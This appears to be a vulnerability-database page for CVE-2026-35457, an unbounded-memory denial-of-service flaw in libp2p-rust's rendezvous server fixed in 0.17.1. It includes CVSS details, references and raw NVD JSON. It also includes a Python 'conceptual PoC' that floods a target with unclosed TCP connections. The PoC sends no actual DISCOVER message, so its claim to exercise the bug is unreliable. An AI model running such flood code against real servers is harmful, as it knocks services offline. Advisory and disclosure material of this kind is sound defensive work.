CVE-2026-35457

Description

libp2p-rust is the official rust language Implementation of the libp2p networking stack. Prior to 0.17.1, the rendezvous server stores pagination cookies without bounds. An unauthenticated peer can repeatedly issue DISCOVER requests and force unbounded memory growth. This vulnerability is fixed in 0.17.1.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:protocol:libp2p:*:*:*:*:*:rust:*:* - VULNERABLE

libp2p-rust < 0.17.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import time

# Conceptual PoC for CVE-2026-35457
# This script simulates sending repeated DISCOVER requests to a libp2p rendezvous server.
# Note: Actual libp2p protocol implementation (protobuf/multistream) is required for a real exploit.

TARGET_IP = "127.0.0.1"
TARGET_PORT = 9999

def send_discover_flood():
    print(f"[*] Starting DoS flood on {TARGET_IP}:{TARGET_PORT}...")
    count = 0
    try:
        while True:
            # In a real scenario, this would construct a valid libp2p packet
            # containing a DISCOVER message.
            # For simulation, we open a connection to consume resources.
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((TARGET_IP, TARGET_PORT))
            
            # Logic to send DISCOVER request would go here
            # s.send(data) 
            
            count += 1
            if count % 100 == 0:
                print(f"[*] Sent {count} requests. Memory growing...")
            # Not closing the socket or sending valid pagination cookies 
            # forces the server to keep state if vulnerable.
            time.sleep(0.01) 
    except KeyboardInterrupt:
        print("\n[!] Attack stopped by user.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    send_discover_flood()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35457
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35457
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35457/
[4] VulDB https://vuldb.com/cve/CVE-2026-35457
[5] https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-v5hw-cv9c-rpg7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35457", "sourceIdentifier": "[email protected]", "published": "2026-04-07T15:17:43.587", "lastModified": "2026-04-24T13:32:56.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libp2p-rust is the official rust language Implementation of the libp2p networking stack. Prior to 0.17.1, the rendezvous server stores pagination cookies without bounds. An unauthenticated peer can repeatedly issue DISCOVER requests and force unbounded memory growth. This vulnerability is fixed in 0.17.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:protocol:libp2p:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.17.1", "matchCriteriaId": "0EA2FB25-A1F1-4E02-A0C9-0BCC07AFCA5C"}]}]}], "references": [{"url": "https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-v5hw-cv9c-rpg7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}